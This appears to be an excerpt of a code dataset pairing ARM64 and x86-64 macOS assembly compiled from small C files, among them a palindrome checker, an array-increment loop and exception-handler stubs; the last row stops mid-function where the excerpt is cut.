arm
stringlengths 122
20M
| x86
stringlengths 122
20M
| filename
stringlengths 18
26
|
---|---|---|
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
mov x0, #1024
bl _malloc
stur x0, [x29, #-16]
ldur x8, [x29, #-16]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB0_16
b LBB0_1
LBB0_1:
mov w8, #1
stur w8, [x29, #-20]
b LBB0_2
LBB0_2: ; =>This Loop Header: Depth=1
; Child Loop BB0_4 Depth 2
ldursw x8, [x29, #-20]
mov x9, #58368
movk x9, #21515, lsl #16
movk x9, #2, lsl #32
subs x8, x8, x9
cset w8, ge
tbnz w8, #0, LBB0_15
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_2 Depth=1
ldur x0, [x29, #-16]
ldur w8, [x29, #-20]
ldur w9, [x29, #-20]
mul w10, w8, w9
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
mov w1, #0
mov x2, #-1
adrp x3, l_.str@PAGE
add x3, x3, l_.str@PAGEOFF
bl ___sprintf_chk
ldur x0, [x29, #-16]
bl _strlen
mov x8, x0
str w8, [sp, #24]
mov w8, #-1
str w8, [sp, #20]
ldr w8, [sp, #24]
str w8, [sp, #16]
mov w8, #1
str w8, [sp, #12]
b LBB0_4
LBB0_4: ; Parent Loop BB0_2 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #20]
add w9, w8, #1
str w9, [sp, #20]
ldr w9, [sp, #24]
mov w10, #2
sdiv w9, w9, w10
subs w8, w8, w9
cset w8, ge
mov w9, #0
str w9, [sp, #8] ; 4-byte Folded Spill
tbnz w8, #0, LBB0_6
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_4 Depth=2
ldr w8, [sp, #16]
subs w9, w8, #1
str w9, [sp, #16]
ldr w9, [sp, #24]
mov w10, #2
sdiv w9, w9, w10
subs w8, w8, w9
cset w8, gt
str w8, [sp, #8] ; 4-byte Folded Spill
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_4 Depth=2
ldr w8, [sp, #8] ; 4-byte Folded Reload
tbz w8, #0, LBB0_10
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_4 Depth=2
ldur x8, [x29, #-16]
ldrsw x9, [sp, #20]
ldrsb w8, [x8, x9]
ldur x9, [x29, #-16]
ldrsw x10, [sp, #16]
ldrsb w9, [x9, x10]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB0_9
b LBB0_8
LBB0_8: ; in Loop: Header=BB0_2 Depth=1
str wzr, [sp, #12]
b LBB0_10
LBB0_9: ; in Loop: Header=BB0_4 Depth=2
b LBB0_4
LBB0_10: ; in Loop: Header=BB0_2 Depth=1
ldr w8, [sp, #12]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_12
b LBB0_11
LBB0_11: ; in Loop: Header=BB0_2 Depth=1
ldur x8, [x29, #-16]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
b LBB0_13
LBB0_12: ; in Loop: Header=BB0_2 Depth=1
ldur x8, [x29, #-16]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
b LBB0_13
LBB0_13: ; in Loop: Header=BB0_2 Depth=1
b LBB0_14
LBB0_14: ; in Loop: Header=BB0_2 Depth=1
ldur w8, [x29, #-20]
add w8, w8, #1
stur w8, [x29, #-20]
b LBB0_2
LBB0_15:
b LBB0_16
LBB0_16:
mov w0, #0
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%lld"
l_.str.1: ; @.str.1
.asciz "%s => Palindrom\n"
l_.str.2: ; @.str.2
.asciz "%s => Not a Palindrom\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movl $0, -4(%rbp)
movl $1024, %edi ## imm = 0x400
callq _malloc
movq %rax, -16(%rbp)
cmpq $0, -16(%rbp)
je LBB0_16
## %bb.1:
movl $1, -20(%rbp)
LBB0_2: ## =>This Loop Header: Depth=1
## Child Loop BB0_4 Depth 2
movslq -20(%rbp), %rax
movabsq $10000000000, %rcx ## imm = 0x2540BE400
cmpq %rcx, %rax
jge LBB0_15
## %bb.3: ## in Loop: Header=BB0_2 Depth=1
movq -16(%rbp), %rdi
movl -20(%rbp), %r8d
imull -20(%rbp), %r8d
xorl %esi, %esi
movq $-1, %rdx
leaq L_.str(%rip), %rcx
movb $0, %al
callq ___sprintf_chk
movq -16(%rbp), %rdi
callq _strlen
## kill: def $eax killed $eax killed $rax
movl %eax, -24(%rbp)
movl $-1, -28(%rbp)
movl -24(%rbp), %eax
movl %eax, -32(%rbp)
movl $1, -36(%rbp)
LBB0_4: ## Parent Loop BB0_2 Depth=1
## => This Inner Loop Header: Depth=2
movl -28(%rbp), %ecx
movl %ecx, %eax
addl $1, %eax
movl %eax, -28(%rbp)
movl -24(%rbp), %eax
movl $2, %esi
cltd
idivl %esi
movl %eax, %edx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl %edx, %ecx
movb %al, -37(%rbp) ## 1-byte Spill
jge LBB0_6
## %bb.5: ## in Loop: Header=BB0_4 Depth=2
movl -32(%rbp), %eax
movl %eax, -44(%rbp) ## 4-byte Spill
addl $-1, %eax
movl %eax, -32(%rbp)
movl -24(%rbp), %eax
movl $2, %ecx
cltd
idivl %ecx
movl %eax, %ecx
movl -44(%rbp), %eax ## 4-byte Reload
cmpl %ecx, %eax
setg %al
movb %al, -37(%rbp) ## 1-byte Spill
LBB0_6: ## in Loop: Header=BB0_4 Depth=2
movb -37(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB0_7
jmp LBB0_10
LBB0_7: ## in Loop: Header=BB0_4 Depth=2
movq -16(%rbp), %rax
movslq -28(%rbp), %rcx
movsbl (%rax,%rcx), %eax
movq -16(%rbp), %rcx
movslq -32(%rbp), %rdx
movsbl (%rcx,%rdx), %ecx
cmpl %ecx, %eax
je LBB0_9
## %bb.8: ## in Loop: Header=BB0_2 Depth=1
movl $0, -36(%rbp)
jmp LBB0_10
LBB0_9: ## in Loop: Header=BB0_4 Depth=2
jmp LBB0_4
LBB0_10: ## in Loop: Header=BB0_2 Depth=1
cmpl $0, -36(%rbp)
je LBB0_12
## %bb.11: ## in Loop: Header=BB0_2 Depth=1
movq -16(%rbp), %rsi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB0_13
LBB0_12: ## in Loop: Header=BB0_2 Depth=1
movq -16(%rbp), %rsi
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
LBB0_13: ## in Loop: Header=BB0_2 Depth=1
## %bb.14: ## in Loop: Header=BB0_2 Depth=1
movl -20(%rbp), %eax
addl $1, %eax
movl %eax, -20(%rbp)
jmp LBB0_2
LBB0_15:
jmp LBB0_16
LBB0_16:
xorl %eax, %eax
addq $48, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%lld"
L_.str.1: ## @.str.1
.asciz "%s => Palindrom\n"
L_.str.2: ## @.str.2
.asciz "%s => Not a Palindrom\n"
.subsections_via_symbols
| the_stack_data/66658.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _foo ; -- Begin function foo
.p2align 2
_foo: ; @foo
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
adrp x8, _JStart@GOTPAGE
ldr x8, [x8, _JStart@GOTPAGEOFF]
str x8, [sp, #8] ; 8-byte Folded Spill
adrp x8, _IStart@GOTPAGE
ldr x8, [x8, _IStart@GOTPAGEOFF]
ldr w8, [x8]
str w8, [sp, #20]
b LBB0_1
LBB0_1: ; =>This Loop Header: Depth=1
; Child Loop BB0_3 Depth 2
ldr w8, [sp, #20]
adrp x9, _IEnd@GOTPAGE
ldr x9, [x9, _IEnd@GOTPAGEOFF]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_8
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #8] ; 8-byte Folded Reload
ldr w9, [x8]
add w9, w9, #1
str w9, [x8]
ldr w8, [x8]
str w8, [sp, #24]
b LBB0_3
LBB0_3: ; Parent Loop BB0_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #24]
adrp x9, _JEnd@GOTPAGE
ldr x9, [x9, _JEnd@GOTPAGEOFF]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_6
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_3 Depth=2
ldrsw x8, [sp, #20]
mov x10, #800
mul x11, x8, x10
adrp x8, _U@GOTPAGE
ldr x8, [x8, _U@GOTPAGEOFF]
mov x9, x8
add x9, x9, x11
ldrsw x11, [sp, #24]
ldr d0, [x9, x11, lsl #3]
fmov d1, #1.00000000
fadd d0, d0, d1
ldrsw x9, [sp, #20]
mul x9, x9, x10
add x8, x8, x9
ldrsw x9, [sp, #24]
str d0, [x8, x9, lsl #3]
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_3 Depth=2
ldr w8, [sp, #24]
add w8, w8, #1
str w8, [sp, #24]
b LBB0_3
LBB0_6: ; in Loop: Header=BB0_1 Depth=1
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #20]
add w8, w8, #1
str w8, [sp, #20]
b LBB0_1
LBB0_8:
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.comm _IStart,4,2 ; @IStart
.comm _IEnd,4,2 ; @IEnd
.comm _JStart,4,2 ; @JStart
.comm _JEnd,4,2 ; @JEnd
.comm _U,80000,3 ; @U
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.section __TEXT,__literal8,8byte_literals
.p2align 3 ## -- Begin function foo
LCPI0_0:
.quad 0x3ff0000000000000 ## double 1
.section __TEXT,__text,regular,pure_instructions
.globl _foo
.p2align 4, 0x90
_foo: ## @foo
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq _IStart@GOTPCREL(%rip), %rax
movl (%rax), %eax
movl %eax, -12(%rbp)
LBB0_1: ## =>This Loop Header: Depth=1
## Child Loop BB0_3 Depth 2
movl -12(%rbp), %eax
movq _IEnd@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jge LBB0_8
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movq _JStart@GOTPCREL(%rip), %rax
movl (%rax), %ecx
addl $1, %ecx
movq _JStart@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq _JStart@GOTPCREL(%rip), %rax
movl (%rax), %eax
movl %eax, -8(%rbp)
LBB0_3: ## Parent Loop BB0_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -8(%rbp), %eax
movq _JEnd@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jge LBB0_6
## %bb.4: ## in Loop: Header=BB0_3 Depth=2
movslq -12(%rbp), %rcx
movq _U@GOTPCREL(%rip), %rax
imulq $800, %rcx, %rcx ## imm = 0x320
addq %rcx, %rax
movslq -8(%rbp), %rcx
movsd LCPI0_0(%rip), %xmm0 ## xmm0 = mem[0],zero
addsd (%rax,%rcx,8), %xmm0
movslq -12(%rbp), %rcx
movq _U@GOTPCREL(%rip), %rax
imulq $800, %rcx, %rcx ## imm = 0x320
addq %rcx, %rax
movslq -8(%rbp), %rcx
movsd %xmm0, (%rax,%rcx,8)
## %bb.5: ## in Loop: Header=BB0_3 Depth=2
movl -8(%rbp), %eax
addl $1, %eax
movl %eax, -8(%rbp)
jmp LBB0_3
LBB0_6: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_7
LBB0_7: ## in Loop: Header=BB0_1 Depth=1
movl -12(%rbp), %eax
addl $1, %eax
movl %eax, -12(%rbp)
jmp LBB0_1
LBB0_8:
popq %rbp
retq
.cfi_endproc
## -- End function
.comm _IStart,4,2 ## @IStart
.comm _IEnd,4,2 ## @IEnd
.comm _JStart,4,2 ## @JStart
.comm _JEnd,4,2 ## @JEnd
.comm _U,80000,4 ## @U
.subsections_via_symbols
| the_stack_data/735062.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _darwin_arm_init_thread_exception_port ; -- Begin function darwin_arm_init_thread_exception_port
.p2align 2
_darwin_arm_init_thread_exception_port: ; @darwin_arm_init_thread_exception_port
.cfi_startproc
; %bb.0:
ret
.cfi_endproc
; -- End function
.globl _darwin_arm_init_mach_exception_handler ; -- Begin function darwin_arm_init_mach_exception_handler
.p2align 2
_darwin_arm_init_mach_exception_handler: ; @darwin_arm_init_mach_exception_handler
.cfi_startproc
; %bb.0:
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _darwin_arm_init_thread_exception_port ## -- Begin function darwin_arm_init_thread_exception_port
.p2align 4, 0x90
_darwin_arm_init_thread_exception_port: ## @darwin_arm_init_thread_exception_port
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _darwin_arm_init_mach_exception_handler ## -- Begin function darwin_arm_init_mach_exception_handler
.p2align 4, 0x90
_darwin_arm_init_mach_exception_handler: ## @darwin_arm_init_mach_exception_handler
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/62636529.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _bar ; -- Begin function bar
.p2align 2
_bar: ; @bar
.cfi_startproc
; %bb.0:
sub sp, sp, #128
.cfi_def_cfa_offset 128
stp x29, x30, [sp, #112] ; 16-byte Folded Spill
add x29, sp, #112
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur w0, [x29, #-8]
stur w1, [x29, #-12]
stur w2, [x29, #-16]
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
and w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, lt
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, gt
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, ne
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, le
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, ge
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
stur w8, [x29, #-24] ; 4-byte Folded Spill
ldur w8, [x29, #-12]
subs w8, w8, #0
cset w8, eq
mov w9, #0
stur w9, [x29, #-20] ; 4-byte Folded Spill
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
ldur w8, [x29, #-16]
subs w8, w8, #0
cset w8, ne
stur w8, [x29, #-20] ; 4-byte Folded Spill
b LBB0_2
LBB0_2:
ldur w8, [x29, #-24] ; 4-byte Folded Reload
ldur w9, [x29, #-20] ; 4-byte Folded Reload
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
stur w8, [x29, #-32] ; 4-byte Folded Spill
ldur w8, [x29, #-12]
subs w8, w8, #0
cset w8, ne
mov w9, #1
stur w9, [x29, #-28] ; 4-byte Folded Spill
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3:
ldur w8, [x29, #-16]
subs w8, w8, #0
cset w8, ne
stur w8, [x29, #-28] ; 4-byte Folded Spill
b LBB0_4
LBB0_4:
ldur w8, [x29, #-32] ; 4-byte Folded Reload
ldur w9, [x29, #-28] ; 4-byte Folded Reload
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
mov w9, #0
stur w9, [x29, #-48] ; 4-byte Folded Spill
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
ldur w9, [x29, #-12]
ands w8, w8, w9
cset w8, eq
and w0, w8, #0x1
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
and w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
mov w9, #2
stur w9, [x29, #-52] ; 4-byte Folded Spill
and w0, w8, #0x2
bl _foo
ldur w9, [x29, #-52] ; 4-byte Folded Reload
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, lt
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w9, [x29, #-52] ; 4-byte Folded Reload
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, gt
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w9, [x29, #-52] ; 4-byte Folded Reload
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w9, [x29, #-52] ; 4-byte Folded Reload
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, ne
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w9, [x29, #-52] ; 4-byte Folded Reload
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, le
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w9, [x29, #-52] ; 4-byte Folded Reload
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, ge
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-16]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
mov w9, #1
stur w9, [x29, #-44] ; 4-byte Folded Spill
and w0, w8, #0x1
bl _foo
ldur w9, [x29, #-48] ; 4-byte Folded Reload
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
and w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
ands w8, w8, #0x2
cset w8, eq
and w0, w8, #0x1
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
and w0, w8, #0x2
bl _foo
ldur w0, [x29, #-48] ; 4-byte Folded Reload
bl _foo
ldur w9, [x29, #-52] ; 4-byte Folded Reload
ldur w8, [x29, #-48] ; 4-byte Folded Reload
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, lt
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w9, [x29, #-52] ; 4-byte Folded Reload
ldur w8, [x29, #-48] ; 4-byte Folded Reload
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, gt
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w9, [x29, #-52] ; 4-byte Folded Reload
ldur w8, [x29, #-48] ; 4-byte Folded Reload
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w9, [x29, #-52] ; 4-byte Folded Reload
ldur w8, [x29, #-48] ; 4-byte Folded Reload
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, ne
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w9, [x29, #-52] ; 4-byte Folded Reload
ldur w8, [x29, #-48] ; 4-byte Folded Reload
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, le
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w9, [x29, #-52] ; 4-byte Folded Reload
ldur w8, [x29, #-48] ; 4-byte Folded Reload
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, ge
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w8, [x29, #-48] ; 4-byte Folded Reload
ldur w9, [x29, #-16]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w0, [x29, #-48] ; 4-byte Folded Reload
bl _foo
ldur w0, [x29, #-48] ; 4-byte Folded Reload
bl _foo
ldur w0, [x29, #-44] ; 4-byte Folded Reload
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, lt
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, gt
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, ne
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, le
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, ge
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
stur w8, [x29, #-40] ; 4-byte Folded Spill
ldur w8, [x29, #-12]
subs w8, w8, #0
cset w8, eq
mov w9, #0
stur w9, [x29, #-36] ; 4-byte Folded Spill
tbnz w8, #0, LBB0_6
b LBB0_5
LBB0_5:
ldur w8, [x29, #-16]
subs w8, w8, #0
cset w8, ne
stur w8, [x29, #-36] ; 4-byte Folded Spill
b LBB0_6
LBB0_6:
ldur w8, [x29, #-40] ; 4-byte Folded Reload
ldur w9, [x29, #-36] ; 4-byte Folded Reload
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
str w8, [sp, #52] ; 4-byte Folded Spill
ldur w8, [x29, #-12]
subs w8, w8, #0
cset w8, ne
mov w9, #1
str w9, [sp, #56] ; 4-byte Folded Spill
tbnz w8, #0, LBB0_8
b LBB0_7
LBB0_7:
ldur w8, [x29, #-16]
subs w8, w8, #0
cset w8, ne
str w8, [sp, #56] ; 4-byte Folded Spill
b LBB0_8
LBB0_8:
ldr w8, [sp, #52] ; 4-byte Folded Reload
ldr w9, [sp, #56] ; 4-byte Folded Reload
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
mov w9, #0
str w9, [sp, #40] ; 4-byte Folded Spill
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
ldur w9, [x29, #-12]
orr w8, w8, w9
subs w8, w8, #0
cset w8, eq
and w0, w8, #0x1
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
mov w9, #2
str w9, [sp, #44] ; 4-byte Folded Spill
orr w0, w8, #0x2
bl _foo
ldr w9, [sp, #44] ; 4-byte Folded Reload
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, lt
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldr w9, [sp, #44] ; 4-byte Folded Reload
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, gt
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldr w9, [sp, #44] ; 4-byte Folded Reload
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldr w9, [sp, #44] ; 4-byte Folded Reload
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, ne
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldr w9, [sp, #44] ; 4-byte Folded Reload
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, le
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldr w9, [sp, #44] ; 4-byte Folded Reload
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, ge
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-16]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
mov w9, #1
str w9, [sp, #36] ; 4-byte Folded Spill
orr w0, w8, #0x1
bl _foo
ldr w9, [sp, #40] ; 4-byte Folded Reload
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
orr w8, w8, #0x2
subs w8, w8, #0
cset w8, eq
and w0, w8, #0x1
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
orr w0, w8, #0x2
bl _foo
ldr w0, [sp, #44] ; 4-byte Folded Reload
bl _foo
ldr w8, [sp, #40] ; 4-byte Folded Reload
ldr w9, [sp, #44] ; 4-byte Folded Reload
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, lt
and w9, w9, #0x1
